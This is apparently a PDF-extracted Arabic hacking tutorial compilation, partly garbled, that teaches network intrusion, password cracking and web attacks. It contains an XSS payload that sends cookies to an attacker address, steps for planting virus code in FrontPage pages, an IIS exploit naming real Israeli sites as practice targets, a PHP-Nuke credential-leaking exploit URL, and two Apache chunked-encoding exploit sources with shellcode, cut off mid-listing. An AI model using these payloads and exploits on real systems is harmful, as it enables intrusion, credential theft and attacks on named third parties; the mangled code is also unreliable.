هنا نبدا الهجوم وعلى اي اساس يتركز الهجوم
احيانا يكون هجوم حرمان خدمه واحيانا هجوم اقتحام كامل حسب الموجود والمتوفر والمعلومات الموجوده
لدينا
طيب لنفرض اننا ودنا نخش على شركه معينه باسم aswind.COMالخطوه الولى هي التعرف على مدى
عنوان ipالخاصه بهذه الشركه وهذا سهل
اول شي انصح بالتسجيل في موقع INTERNIC.NET
حتى يعطونك خدمات تستاهل
هناك طريقتين لمعرفه الي بي اول
عن طريق الموقع INTERNIC.NET
والثانيه عن طريق برنامج الدوس بالمر :
NSLOOKUP
SET TYPE = ALL
aswind.COM
راح تطلعلك المعلومات هذي بالضبط :
264
.Registrar: ONLINENIC, INC
Whois Server: whois.OnlineNIC.com
/Referral URL: http://www.onlinenic.com
Name Server: DNS.ASWIND.COM
Name Server: NS1.ASWIND.COM
Updated Date: 01-apr-2002
معنا الكلم هذا ان شركه aswind.comوضعت ارقام الملقامات الخاصه ب DNS = 2
يعني عدد 2خادم DNSوسوت لها نشر يعني هناك على القل سيرفرين شغالين بخدمه DNSيعني هم
يتعتقدون ان الموضوع ماراح ياخذ كثير من طاقه التشغيل للجهزه خاصه DNS
هنا في مجال للدخول وتعديل بيانات DNSبمعنى ان العمليه تصير واسعه شوي
فقط قم بنشر عنوانين من عنواوين Ipفقط مثل ماسوو aswind.comلكن لنفترض انه فيه اكثر من
عنوان لنفول 6مثل .
عشان كذا اقترح على الشركات وضع عنواونين IPللنشر ووضع خوادم DNSعلى اجهزه قديمه وبطيئه
لنك اساسا في حاجه ل DNSدايناميكي وهذا يعني انك تقوم بتشغيل WIN2Kوخدمه DNSعلى جهاز
واحد وهذي من الفكار الجيده في نظري اذا وضعت جهاز خاص فقط بال DNS
طيب لنفرض انك مالقيت شي على اجهزه DNSوبما انك في بدايه هجوم هذا يعني انه عندك متسع من
الوقت اذن قم بتجريب جميع العناوين المتوفره لديك والتي حصلت عليها من HowISوصدقوني فيه ادوات
موجوده بالنت مممكن انها تمسح مجموعه IPموجوده في شبكه معينه
طيب قم بعمل ملف اسمه LMHOSTSيوجود فيه اسم NetBiosلكل عنوان IPاستطعت انك تحصل
عليه
يعني انت عرفت ان الشبكه من كلس Cوعنوانها 200.200.200.0سو لك ملف LMHOSTSباسم
NetBiosوملف باسم N2 = 200.200.200.2وهكذا بعدين تحتاج عمل Net view
//servernameلكل اسم من N1إلى N254يعني كانك تسوي سكان بورت بس بطريقه ثانيه
من جهاز رقم 1إلى جهاز رقم 254
وبالنسبه للجهزه الصحيحه سوف تشتغل الخدمه فيها ام العناوين الغير متصله فلن تستجيب طبعًا
265
johnPC
الن موجود معك اسم مستخدم ) احتمال يكون ( Administratorطيب وش نسوي
؟
قوم بتعطيل خدمه Messenger Serviceفي جهزك ) ولن يتم تسجيل اسمك في النطاق يعني بتخش
مخفي (
وبالسنبه ل MSBROWSERاذا شفتها بعد عمل المر nbtstat -a
هذا يعني انه استعراض رئيسي للمجال وهذا من اكبر الخطاء التي يقومون بها مدراء الشبكات لن مراقب
المجال يدوخ ل يستطيع التجميع وتستطيع استغلل مثل هذه الثغرات دائما في الشبكات الداخليه
طيب انت الن حصلت على اسم المتسخدم
انت محتاج كلمه المرور وهذي هي المشكله يعني انت ضميت جهازك مع الشبكه لكن ماقدرت تحصل على
كلمه المرور لكن تقدر تحصل عليها nt senstiverاو متحسس الشبكه ) معليش ماني متاكد من السبيلنق
(.
طيب كيف اقدر احصل فعليا على كلمه المرور
غالبا ماتكون كلمات مرور المستخدمين تاففه جدا هاذ اذا وجدت اصل
يعني برنامج مثل l0pthcrackيحل لك المشكله.
انتهى،،،
266
" " Cross Site Scripting
المتطلبات :
اطلع غير متعمق على لغات السكربتينق وهي JAVASCRIPT ,PERL ,CGI ,VBSCRIPT
===========================================================
====================================
* افهام القارئ عن الكيفية التى يتم فيها سرقة معلومات هامه من جهاز المستخدم
* اختراق المنتديات من نوع VBULLETINاو YaBB and UBBاو المجلت من البهب نيوك او
بوست نيوك
*افهام القراء عن الكيفية التي تتم فيها سرقة الكوكيز او اختطاف الجلسة من المستخدمين
===========================================================
=====================================
الختراق ليس ال تشغيل للمخ واستغلل لشياء لها فائده وارجو من يقرا هذا الموضوع بان يحاول التعود
على مسألة القراءة والترجمه ثم يلجأ الى التطوير ويترك عنه مسألة المطامر من منتدى لمنتدى او
267
المواقع التي تطرح الثغرات المنية ...هل نحتاج الى امة تطور نفسها ..ام نطور انفسنا نحو المية
===========================================================
=====================================
المشكلة :
كما هو معروف فان مستعرضات الوب مثل الكسبلورر او نت سكيب ...الخ تاتي مترجمات النصوص او
السكربتات
مبنية داخلها ويتم ترجمة السكربتات على جهاز المستخدم فلو اننا طلبنا صفحة كان بها سكربت معين
فان المستعرض يترجم هذا السكربت ويظهره على نفس الصفحه المطلوبه .
اما بالنسبة للمنديات او مجموعات النقاش فانها ترفض مثل هذه السكربتات وتعتبرها خرق للخصوصية
><SCRIPT>malicious code</SCRIPT
ان كلمة malicious codeتم ادرجها او حقنها في بين علمتي السكربت وقد تحتوي على كود خبيث
يسرق او يرسل بيانات ...الخ لذلك فان مصمموا برامج المنتديات ومطوروا يمنعونها ال اذا مكنها الدمن
او المصمم او قد يتم استخدامها اذا مكن المنتدى تفيل HTMLمثل يتم ادراج السكربت مكان خاصية المج
>script>document.write('<img
<src="http://my_ip_address/'+document.cookie+'">';</script
او قد يستطيع السكربت ان يكتب على شكل رابط في صفحة او يرسل لك بالبريد او يرسل لك عن طريق
المسنجر
>?A HREF="http://example.com/comment.cgi
<mycomment=<SCRIPT>malicious code</SCRIPT>"> Click here</A
انظر هنا وركز في كيفية عمل الكود انها فقط عندما يصلك باحد الطرق المذكوره اعله وتضغط عليه سينفذ
السكربت
وللشرح اكثر لنفرض ان السكربت comment.cgiسكربت يرسل ملحظاتك لصاحب الموقع او قد يكون
سكربت للبحث
268
في الموقع او المنتدى وهو يحتوي على متغير داخله اسمه mycommentياخذ المدخلت او الملحظات
التي تكتبها
فلو اعتبرناه انه سكربت بحث ويولد صفحات ديناميكية ناتجه من البحث ستكون النتائج وخيمة فبدل ان
ينتج الصفحات الحيوية او النشطه سينتج مايطلبه السكربت منه لحظ الفكره هنا فقد ضمن السكربت داخل
حقل نصي فبدل من ان ياخذ الحقل النصي نصوص استخدم ليأخذ اوامر من السكربت .
هنا استخدم نفس السكربت السابق لكن هذه المره طوره اكثر ليكون مستخدما في ادراج ملف من موقع اخر
والذي
هو بالسم BADFILEولن مصدر البيانات ادخل فيه عدة مصادر اخرى عن طريق السكربت المذكور فأن
هذا الهجوم
يسمى ب cross-site scriptingاو الترجمه من عندي " برمجة عبور الموقع " لننا عبرنا باستخدام
برمجة
السكربتات اكثر من موقع واذا كنت تلحظ في السيكيورتي فوكس او المواقع المنيه تختصر ب CSSوهي
اختصار
ومن الممكن ان يكون هناك وسم النماذج > <formمن وسوم HTMLوبنفس الفكار السابقة يمكن تنفيذ
الوامر
اذا كنت قرات ماكتبته عن التكويد السداسي عشر واليونيكود تستطيع الن ان تفهم ما اقصده
=========================================================
http://www.perl.com/pub/a/2002/02/20/css.html
269
انتهى،،،
نحن سوف نضع كل شي حسب ما هو مطلوب ولكن عندما نأتي لكتابة التعليق...........نقف ونكتب:
.
.
.
.
.
.
.
.
.
.
.
.
.
=
--><h3>put your text here<xmp><plaintext
==================================================
270
يمكنك كتابة اي شي تريد في مكان .... put your text hereوهذا كل شي ....بعد توقيعك اعمل
ريفريش وانظر ماذا حصل
ملحظه:
=====
الكود ل يعمل مع بعض انواع سجل الزوار؟!
انتهى،،،
اختار صفحة جديدة ...هاتلقي تحت ثلث مربعات الول عادي والثاني htmlوالثالث معاينة
انت خليك في العادي
اختار ادراج
ثم اختار مكون ويب .....هايطلعلك جدول صغير من خانتين ...خليك في الخانة الولى اللي على اليمين
واختار منها ااخر اختيار اللي هو "عناصر تحكم متقدمة" اضغط ضغطه واحده وهايظهرلك عناصر في الخانه
اللي على اليسار اختار اول اختيار اللي هو " ... "HTMLهايفتحلك مربع تاني ...انت عليك تحط في المربع
ده كود الفيرس وتضغط موافق (:وكده الطبخة استوت .
واوعى تضغط على معاينة الصفة وانت معندكش نورتن لكن لو عندك هايديك تحذير بوجود فيروس
الطريقه للي عنده فرونت بيج عربي واللي عنده انجليزي هي نفس الخطوات مع تغيير السامي.
انتهى،،،
271
" الثغرااات "
= Exploitاسثمار = ثغرة
الجزء المهم:
الثغرات هي أخطاء برمجية في نظام التشغيل ويمكنك استغللها للحصول على ملف الباسوورد وقاعدة
البيانات وووو..إلخ
أول يجب أن تجمع كل المعلومات الممكنة حول الموقع :
-1المنافذ المفتوحة مثل الف تي بي والتلنت مثل وهذ عن طريق برامج مثل
super scan
ابحث عنه في النترنت.
-2معرفة نظام تشغيل الموقع ويندوز أم لينوكس وغيرها والفائدة من ذلك أن كل نظام له ثغراته الخاصة به
واسم المجلد الذي به ملف الباسوورد يختلف من نظام تشغيل لخر.
لمعرفة نظام التشغيل إذهب إلى الموقع
www.netcraft.net
واكتب الموقع ثم إنتر !.!!..وستعرف بعض المعلومات عن الموقع كليبي ونظام التشغيل...إلخ
-3معرفة كل مايقدمه الموقع من خدمات كالبريد وغير ذلك
-4معرفة البرامج المثبتة على الموقع مثل المنتديات وبرامج السي جي آي
أنواع الثغرات
أبسط النواع هي التي يمكن الوصول إليها عن طريق المتصفح مثل
/....../www.thesite.com
والنواع الباقية أو الستثمارات :
ثغرات مكتوبة بلغة بيرل *pl.
ويمكن استخدامها في لينوكس أو في ويندوز إذا كان لديك برنامج
Active Perl
ثغرات بلغة سي
* c.يمكن استخدامها في لينوكس فقط
ثغرات بلغة شل
*sh.ويمكن استثمارها في لينوكس فقط
ويمكنك إيجاد الكثير من النواع السابقة الخاصة بلينوكس فيمواقع الثغرات وإليك بعضها
www.securiteam.com
www.securityfocus.com
www.ukrt.f2s.com
www.ussrback.com
www.packetstorm.securify.com
272
www.secureroot.com
www.rootshell.com
أما ثغرات المتصفح يمكنك الكشف عنها بالبرامج الموجودة في قسم البرامج.
ويمكنك من خلل البرامج الموجودة على السيرفر كالمنتديات أو برمجيات بيرل وسيجي آي أن تبحث عن
ثغرات لها في مواقع الثغرات أو المواقع السابقة.وبرمجيات بيرل وسي جي آي قد تكون كتاب زوار أو محرك
بحث أو حتى عداد زوار
حسنا لنفرض أنك حصلت على ملف الباسوورد..المشكلة أن كلمةالسر تكون بداخله مضللة shadowed
أو مشفرة .encryption
مثال لملف باسوورد
root:x:0:1:Super-User:/:/sbin/sh daemon:x:1:1::/: bin:x:2:2::/usr/bin:
sys:x:3:3::/: adm:x:4:4:Admin:/var/adm: lp:x:71:8:Line Printer
Admin:/usr/spool/lp: smtp:x:0:0:Mail Daemon User:/: uucp:x:5:5:uucp
Admin:/usr/lib/uucp: nuucp:x:9:9:uucp
ولن ملف الباسوورد يحتوي على كلمات سر الشخاص المرخص لهم بدخول الموقع قد ل بزيد عن عشرة
أسطر وقد يصل آلف السطر...
كلمات السر السابقة مضللة وهي علمة xوقد تختلف..
أما المشفرة والتي سنحصل عليها تكون هكذا:
مضللة root:x:0:1:Super-User:/:/sbin/sh
مشفرة root:Q71KBZlvYSnVw:0:1:Super-User:/:/sbin/sh
= rootأو الجذر اسم المستخدم
= xكلمةالسر ولكنها مضللة
وباقي السطر غير مهم
في الغلب ستكون كلمة السر مضللة shadowedلذا عليك أن تبحث عن ملف آخر يحوي كلمة السر
مشفرة يسمى ملف الشادو
shadow file
ويوجد في أماكن معينة تختلف باختلف نظام التشغيل
= tokenالرمز الذي يعبر عن الباسوورد
273
سيظهر :
by Sola 97,John the Ripper Version 1.3 Copyright (c) 1996
Loaded 1 password
انتهى،،،
" شرح شبه مفصل عن الثغرات "
274
و هناك نوع اخر من السكانرز و ان احبذه <<< shadow security scaner...
.....على فكره من احسن المواقع التي يمكن ان تجد بها احدث الثغرات هو rootshell.comو هو
يحتوي على
محرك بحث يكفي ان تضع مفتاح للبحث عباره عن كلمه واحده او كلمتان مثل red hat 7.2و سوف تجد
العديد من الثغرات التي تحتوي على
...... red hat 7.2
××××××××××××××××××××××××××××××××××××××××××××××××××
××××××××××××××××××××××××××××××××××
××××××××××××××××××××××××××××××××××××××××××××××××××
×××××××××××××××××××××××××××××××××
3انواع مختلفه من الستثمارات :
طبعا الكثير من الستثمارات يكون هدفها هو منحك الرووت على السيرفير ..معنى كلمه رووت هو المدير
او الدمين ..ل يوجد اي قيود على ال commandsاللي الرووت يكتبها ..اي لك كل الصلحيات على
السيرفير
و الحصول على الرووت يمكن ان يتم من خلل العديد من الثغرات مثل ثغرات ال , httpو ال BOFو
غيرها ..
كها تعتمد على طريقه عمل الثغرات ..فهي قد تعطي لك صلحيه قراءه و حذف و الكتابه عل الملفات و ايضا
رفع ملفات الى السيرفير ....
او قد تعطي لك الكلمه السريه و اسم اليوزر اما في صوره واضحه مثل الملف config.incاو مشفره
بمقياس
... DES/MD5كما في الملف .... etc/passwd/في انظمه اليونيكس ...
بالنسبه للبفر اوفر فلو فهو يشبه الى حد كبير هجوم ال DoSو لكنه ل يسبب ضرر للسيرفير مثلما يسببه
هجوم ال DoSالمهم انه في اغلب الحيان يكون البفر عباره عن ارسال اوامر للسيرفير تنتهي دائما
باعطائك
صلحيه الرووت ...و هذا بسبب استقبال السيرفير لكم هائل من الداتا فيؤدي الى ارباك السيرفير ..
××××××××××××××××××××××××××××××××××××××××××××××××××
×××××××××××××××××××××××××××××××××
انتهى،،،
275
" كيف تستخدم الثغرات "
>ةةةةة<
>ةةةةةة<oOoDa BE$T :
البداية:
txt. :
ويعني ملف ملف نصي..من الممكن اي يحتوي على سورس كود لبعض الثغرات او البرامج المكتوبة بالسي
,البير..اكمل القراءة لتعرف كيفية استخدامها..
c. :
هو برنامج سي لكنه سورس كود فقط..واغلب الثغرات يتم كتابتها بالسي..هذا يفترض عليك
عليك تحميله ثم عمل )_ (compileوهذا يعني تحويل السورس كود لملف )برنامج(_ ثم تثوم
بتشغيله...لكن المشكلة هنا انه لن يمكن تشغيلها تحت بيئة ويندوز..فيجب ان يكون عندك Linuxاو
.. Shell Account
بعض التحميل توجه للمسار الموجود به المفل ثم اكتب:
>---- gcc filenmae.cامر الكومبايل
سينتج الملف:
>--- a.outوهو البرنامج الناتج..
كمثال:
a.out xxx.xxx.xxx.xxx/.
للثغرات المكتوبة بالبيرل:
pl. :
برنامج بيرل..لتشغيله ايضا تحتاج Linuxاو Shell Account
اذا كان exploitواردت ان تطبقه على موقع اكتب:
perl filename.pl xxx.xxx.xxx.xxx
او
filename xxx.xxx.xxx.xxx/.
276
انتهى،،،
الشرح :
اوًل الثغره يا أخوان تطبق على سيرفرات :
Microsoft-IIS/5.0 on Windows 2000
يا أخوان كل مانحتاجه هي اداه بسيطه يقدمها لنا وندوز 98وانني ل اعلم ان كانت النسخ الخرى تمتلك مثل
هذه لخاصيه ام ل لنني اعمل على نظامين فقط لينكس ماندريك ووندوز 98فقط :
ثم ستجدها هناك ليس داخل السي او شيء آخر بل داخل My Computerفقط يعني تكون هي مع السي
والدي الى آخره
/http://hostname.com
277
حيث ان hostnameهو ايبي الموقع انتبه قلنا ايبي الموقع وليس السم
والجميع يعرف كيف يخرج اليبي تبع الموقع وهناك دروس كثيره بخصوص هذا الموضوع
وهذه مواقع اسرائيليه للتطيبق حيث انها تعمل على ايبي موحد :
mail.talcar.co.il
daihatsu-israel.co.il
daewoo-israel.co.il
وهنا سوف تعمل الداه بتحميل ملفات الموقع وتعطيك خاصية الدمن وهي تحميل وازالة الملفات
عندها تذهب الى ال Web Folder :وتجد ملف الموقع هناك ومسمى تحت ايبي الموقع
http://www.israwine.co.il/ 212.199.43.84
ملحظه :اذا تم طلب ادخال باسوورد ويوزر نيم فأعرف ان الثغره مغلقه
او اذا دخلت الى الملفات ولم تجد اي ملف فمعناه ان الثغره مغلقه ايضًا
اسئل ال التوفيق والعافيه اللهم امين اللهم امين.
انتهى،،،
278
" " ثغرة نيوك
<>ةةةةة
>Arab VireruZ :>ةةةةةة
: الشرح بالنقليزية
:Found by
LucisFero and supergate
twlc/.
Summary
This time the bug is really dangerous...it allows you to 'cp' any file on
...the box... or even upload files
Systems Affected
all the versions ARE vulnerable
except '5.0 RC1' (i wonder why a released c. is ok while the final 5.2 is
(bugged
Explanation
?Do you need sql password
http://www.server.net/admin.php?
upload=1&file=config.php&file_name=hacked.txt&wdir=/images/&userfil
e=config.php&userfile_name=hacked.txt
279
the admin 'login' page will be prompted just go to
http://www.server.net/images/hacked.txt and you will see config.php that
as everyone knows contain the sql's passwords, you can even upload
files...i leave you the 'fun' to find all the ways to use it... and try to dont
be a SCRIPT KIDDIE we wrote this advisory to help who runs php nuke
.and NOT TO LET YOU HAVE FUN
that doesnt do a check to see if you are logged as admin or no... so you
...can use it anyway
Solution
we erased the function... cause we wanted to remove the file manager
-anyway but i suggest you to do the same... -to upload files use FTP
:conclusions
yet another bug of php nuke... this software is used by thousands of
people... (we run something based on it too) i hope that this time the
author will reply soon and will release a patch too! as i said before just
dont try to be a script kiddie or we simply WONT post anymore this kind
of advisories. Prolly the funny thing is that who first discovered the bug
was LucisFero that... 2 hours before didnt knew php ... so i (supergate)
.fear him and you should too
:posted at
http://www.twlc.net article http://www.twlc.net/article.php?sid=421
bugtraq@securityfocus.com
280
-http://www.phpnuke.org -good luck
http://sourceforge.net/tracker/?group_id=7511 Project: PHP-Nuke Web
Portal System
and of course mailed to the author of php nuke
contacts (bugs, ideas, insults, cool girls... remember that trojans are
:(directed to /dev/null
lucisfero@twlc.net
supergate@twlc.net
eof
-=-=-=-=-=-=-=Arab VireruZ=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=
=-=-=-=-=-=-=-=-=-=-=
:الخطأ البرمجي
;(basedir = dirname($SCRIPT_FILENAME$
;textrows = 20$
;textcols = 85$
;(udir = dirname($PHP_SELF$
;"/"=if(!$wdir) $wdir
;"if($cancel) $op="FileManager
} (if($upload
;(copy($userfile,$basedir.$wdir.$userfile_name
;"lastaction = ""._UPLOADED." $userfile_name --> $wdir$
This need a rewrite -------------------------------------> OMG! WE TOTALY //
AGREEEEEEEE lmao
;("include("header.php//
;(GraphicAdmin($hlpfile//
;()html_header//
;()displaydir//
;"/"=wdir2$
;(chdir($basedir . $wdir2
;()CloseTable//
;("include("footer.php//
;("Header("Location: admin.php?op=FileManager
;exit
{
-=-=-=-=-=-=-=Arab VireruZ=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=
=-=-=-=-=-=-=-=-=-=-=
:الثغرة
http://www.server.net/admin.php?
upload=1&file=config.php&file_name=hacked.txt&wdir=/images/&userfil
e=config.php&userfile_name=hacked.txt
281
=-=-=-=-=-=-=-=Arab VireruZ=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-
==-=-=-=-=-=-=-=-=-=-
الثغرة بعد التعديل
?http://www.server.net/admin.php
upload=1&file=config.php&file_name=ultramode.txt&wdir=/&userfile=co
nfig.php&userfile_name=ultramode.txt
=-=-=-=-=-=-=-=Arab VireruZ=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-
==-=-=-=-=-=-=-=-=-=-
عمل الثغرة:
=-طبع ملف الكونفيج config.phpالى الملف النصي الموجود ultramode.txtلن تحتاج تحميل ملف
نصي لطبع الملف
كما هو موجود بالشرح النقليزي يعني فكر واستنتج (-:ولن بعض المواقع تمنع التحميل الى الموقع الن
ما عليك سوى الدخول الى http://server.com/ultramode.txt
وستجد باس واليوزر التابع لقاعدة بيانات الموقع=-
ملحظات
-1بدل server.comبالموقع الراد اختراقه
انتهى،،،
282
" ثغرة " Chunked
كلنا سمع بثغره تسمى Chunkedلـ ، Apacheالسبب لعدم تحدث موقع angels-bytesعنها هو
أنها أتت قبل إنطلق الموقع ،الن سأضع ، Retina Apache Chunked Scannerوهي أداة
تقوم بفحص نطاق من 254عنوان آي بي ،وتظهر لك ما منها مصاب بهذه الثغره.
إذا أردت معالجة هذه الثغره عند وجودها فأنصحك بتنزيل أباتشي 2.0.39فهو الفضل الى الن
هذه هي وصلة التنزيل
http://www.apache.org/dist/httpd/binaries
أما لمسألة إستثمار هذه الثغره فسوف أضع لكم أفضل أستثمارين
الخطأ في أباتشي 1.3.24واعلى إلى 2و من 2إلى ، dev-2.0.36وهي في الروتين البرمجي الذي
يتعامل مع رسائل الخطأ
هذان الستثماران تستخدمان من قبل مهاجم بعيد لتسبب طفح محلي في السيرفر المصاب ،مؤديه بذلك إلى
إعادة كتابه في الذاكرة ،وبطريقة ما تسمح لتنفيذ كود
283
include#
include#
= []char shellcode
\x89\\\\xe2\\\\x83\\\\xec\\\\x10\\\\x6a\\\\x10\\\\ "\\\
\\x54\\\\x52\\\\x6a\\\\x00\\\\x6a\\\\x00\\\\xb8 \\\
"\\\x1f\\
\x00\\\\x00\\\\x00\\\\xcd\\\\x80\\\\x80\\\\x7a\\\\ "\\\
\\x01\\\\x02\\\\x75\\\\x0b\\\\x66\\\\x81\\\\x7a \\\
"\\\x02\\
\x42\\\\x41\\\\x75\\\\x03\\\\xeb\\\\x0f\\\\x90\\\\ "\\\
\\xff\\\\x44\\\\x24\\\\x04\\\\x81\\\\x7c\\\\x24 \\\
"\\\x04\\
\x00\\\\x01\\\\x00\\\\x00\\\\x75\\\\xda\\\\xc7\\\\ "\\\
\\x44\\\\x24\\\\x08\\\\x00\\\\x00\\\\x00\\\\x00 \\\
"\\\xb8\\
\x5a\\\\x00\\\\x00\\\\x00\\\\xcd\\\\x80\\\\xff \\\\ "\\\
\\x44\\\\x24\\\\x08\\\\x83\\\\x7c\\\\x24\\\\x08 \\\
"\\\x03\\
\x75\\\\xee\\\\x68\\\\x0b\\\\x6f\\\\x6b\\\\x0b \\\\ "\\\
\\x81\\\\x34\\\\x24\\\\x01\\\\x00\\\\x00\\\\x01 \\\
"\\\x89\\
284
\xe2\\\\x6a\\\\x04\\\\x52\\\\x6a\\\\x01\\\\x6a\\\\ "\\\
\\x00\\\\xb8\\\\x04\\\\x00\\\\x00\\\\x00\\\\xcd \\\
"\\\x80\\
\x68\\\\x2f\\\\x73\\\\x68\\\\x00\\\\x68\\\\x2f\\\\ "\\\
\\x62\\\\x69\\\\x6e\\\\x89\\\\xe2\\\\x31\\\\xc0 \\\
"\\\x50\\
\x52\\\\x89\\\\xe1\\\\x50\\\\x51\\\\x52\\\\x50\\\\ "\\\
\\xb8\\\\x3b\\\\x00\\\\x00\\\\x00\\\\xcd\\\\x80\\\
;"\\\xcc\\
} struct
;char *type
;u_long retaddr
!targets[] = { // hehe, yes theo, that say OpenBSD here {
,{ OpenBSD 3.0 x86 / Apache 1.3.20\\\", 0xcf92f"\\\ }
,{ OpenBSD 3.0 x86 / Apache 1.3.22\\\", 0x8f0aa"\\\ }
,{ OpenBSD 3.0 x86 / Apache 1.3.24\\\", 0x90600"\\\ }
,{ OpenBSD 3.1 x86 / Apache 1.3.20\\\", 0x8f2a6"\\\ }
,{ OpenBSD 3.1 x86 / Apache 1.3.23\\\", 0x90600"\\\ }
,{ OpenBSD 3.1 x86 / Apache 1.3.24\\\", 0x9011a"\\\ }
,{ OpenBSD 3.1 x86 / Apache 1.3.24 #2\\\", 0x932ae"\\\ }
;{
} (if(argc != 3
;([printf(\\\"Usage: %s \\\\n\\\", argv[0
;("\\\printf(\\\" Using targets:\\\\t./apache-scalp 3 127.0.0.1:8080\\\\n
printf(\\\" Using bruteforce:\\\\t./apache-scalp 0x8f000
;("\\\127.0.0.1:8080\\\\n
;("\\\printf(\\\"\\\\n--- --- - Potential targets list - --- ----\\\\n
;("\\\printf(\\\"Target ID / Target specification\\\\n
(++for(i = 0; i < sizeof(targets)/8; i
;(printf(\\\"\\\\t%d / %s\\\\n\\\", i, targets[i].type
;return -1
{
285
;("\\\:"\\\ ,[hostp = strtok(argv[2
(if((portp = strtok(NULL, \\\":\\\")) == NULL
;"\\\portp = \\\"80
;(()srand(getpid
;(signal(SIGPIPE, SIG_IGN
} (for(owned = 0, progress = 0;;retaddr += RET_ADDR_INC
;(fflush(stdout
} (if(connect(sock, (struct sockaddr *) & sin, sizeof(sin)) != 0
;("\\\()perror(\\\"connect
;(exit(1
{
(if(!progress
;("\\\printf(\\\"connected!\\\\n
;(lport = ntohs(from.sin_port
286
;shellcode[SHELLCODE_LOCALPORT_OFF + 1] = lport & 0xff
;shellcode[SHELLCODE_LOCALPORT_OFF + 0] = (lport >> 8) & 0xff
;(PUT_BYTES(REP_ZERO, 0
;("\\\PUT_STRING(\\\"\\\\r\\\\n
{
;("\\\PUT_STRING(\\\"Transfer-Encoding: chunked\\\\r\\\\n
;(snprintf(buf, sizeof(buf) - 1, \\\"\\\\r\\\\n%x\\\\r\\\\n\\\", PADSIZE_2
;(PUT_STRING(buf
;(PUT_BYTES(PADSIZE_2, PADDING_2
snprintf(buf, sizeof(buf) - 1, \\\"\\\\r\\\\n%x\\\\r\\\\n\\\",
;(MEMCPY_s1_OWADDR_DELTA
;(PUT_STRING(buf
;++progress
(if((progress%70) == 0
;progress = 1
287
} (if(progress == 1
;((memset(buf, 0, sizeof(buf
sprintf(buf, \\\"\\\\r[*] Currently using retaddr 0x%lx, length %u, localport
,"\\\%u
;(retaddr, (unsigned int)(p - expbuf), lport
;((memset(buf + strlen(buf), \\' \\', 74 - strlen(buf
;(puts(buf
(if(bruteforce
;('\\;'\\)putchar
{
else
;('\\putchar((rand()%2)? \\'P\\': \\'p
;(fflush(stdout
} (while (1
;fd_set fds
;int n
;struct timeval tv
;tv.tv_sec = EXPLOIT_TIMEOUT
;tv.tv_usec = 0
;(FD_ZERO(&fds
;(FD_SET(0, &fds
;(FD_SET(sock, &fds
;((memset(buf, 0, sizeof(buf
} (if(select(sock + 1, &fds, NULL, NULL, &tv) > 0
} ((if(FD_ISSET(sock, &fds
(if((n = read(sock, buf, sizeof(buf) - 1)) <= 0
;break
;(write(1, buf, n
{
} ((if(FD_ISSET(0, &fds
(if((n = read(0, buf, sizeof(buf) - 1)) < 0
;(exit(1
;(write(sock, buf, n
288
{
{
(if(!owned
;break
{
;(free(expbuf
;(close(sock
(if(owned
;return 0
} (if(!bruteforce
;("\\\fprintf(stderr, \\\"Ooops.. hehehe!\\\\n
;return -1
{
{
;return 0
{
:Exploit #2
include#
include#
include#
include#
include#
include#
include#
include#
include#
include#
include#
__ifdef __linux#
include#
endif#
define PADSIZE_1 4#
define PADSIZE_2 5#
define PADSIZE_3 7#
289
define REP_POPULATOR 24#
define REP_SHELLCODE 24#
define NOPCOUNT 1024#
= []char shellcode
\x68\\\\x47\\\\x47\\\\x47\\\\x47\\\\x89\\\\xe3\\\\ "\\\
\\x31\\\\xc0\\\\x50\\\\x50\\\\x50\\\\x50\\\\xc6 \\\
"\\\x04\\\\x24\\
\x04\\\\x53\\\\x50\\\\x50\\\\x31\\\\xd2\\\\x31\\\\ "\\\
\\xc9\\\\xb1\\\\x80\\\\xc1\\\\xe1\\\\x18\\\\xd1 \\\
"\\\xea\\\\x31\\
\xc0\\\\xb0\\\\x85\\\\xcd\\\\x80\\\\x72\\\\x02\\\\ "\\\
\\x09\\\\xca\\\\xff\\\\x44\\\\x24\\\\x04\\\\x80 \\\
"\\\x7c\\\\x24\\
\x04\\\\x20\\\\x75\\\\xe9\\\\x31\\\\xc0\\\\x89\\\\ "\\\
\\x44\\\\x24\\\\x04\\\\xc6\\\\x44\\\\x24\\\\x04 \\\
"\\\x20\\\\x89\\
\x64\\\\x24\\\\x08\\\\x89\\\\x44\\\\x24\\\\x0c\\\\ "\\\
\\x89\\\\x44\\\\x24\\\\x10\\\\x89\\\\x44\\\\x24 \\\
"\\\x14\\\\x89\\
\x54\\\\x24\\\\x18\\\\x8b\\\\x54\\\\x24\\\\x18\\\\ "\\\
\\x89\\\\x14\\\\x24\\\\x31\\\\xc0\\\\xb0\\\\x5d \\\
"\\\xcd\\\\x80\\
\x31\\\\xc9\\\\xd1\\\\x2c\\\\x24\\\\x73\\\\x27\\\\ "\\\
\\x31\\\\xc0\\\\x50\\\\x50\\\\x50\\\\x50\\\\xff \\\
"\\\x04\\\\x24\\
\x54\\\\xff\\\\x04\\\\x24\\\\xff\\\\x04\\\\x24\\\\ "\\\
\\xff\\\\x04\\\\x24\\\\xff\\\\x04\\\\x24\\\\x51 \\\
"\\\x50\\\\xb0\\
\x1d\\\\xcd\\\\x80\\\\x58\\\\x58\\\\x58\\\\x58\\\\ "\\\
\\x58\\\\x3c\\\\x4f\\\\x74\\\\x0b\\\\x58\\\\x58\\\
"\\\x41\\\\x80\\
\xf9\\\\x20\\\\x75\\\\xce\\\\xeb\\\\xbd\\\\x90\\\\ "\\\
\\x31\\\\xc0\\\\x50\\\\x51\\\\x50\\\\x31\\\\xc0 \\\
"\\\xb0\\\\x5a\\
\xcd\\\\x80\\\\xff\\\\x44\\\\x24\\\\x08\\\\x80\\\\ "\\\
\\x7c\\\\x24\\\\x08\\\\x03\\\\x75\\\\xef\\\\x31\\\
"\\\xc0\\\\x50\\
\xc6\\\\x04\\\\x24\\\\x0b\\\\x80\\\\x34\\\\x24\\\\ "\\\
\\x01\\\\x68\\\\x42\\\\x4c\\\\x45\\\\x2a\\\\x68 \\\
"\\\x2a\\\\x47\\
\x4f\\\\x42\\\\x89\\\\xe3\\\\xb0\\\\x09\\\\x50\\\\ "\\\
290
\\x53\\\\xb0\\\\x01\\\\x50\\\\x50\\\\xb0\\\\x04 \\\
"\\\xcd\\\\x80\\
\x31\\\\xc0\\\\x50\\\\x68\\\\x6e\\\\x2f\\\\x73\\\\ "\\\
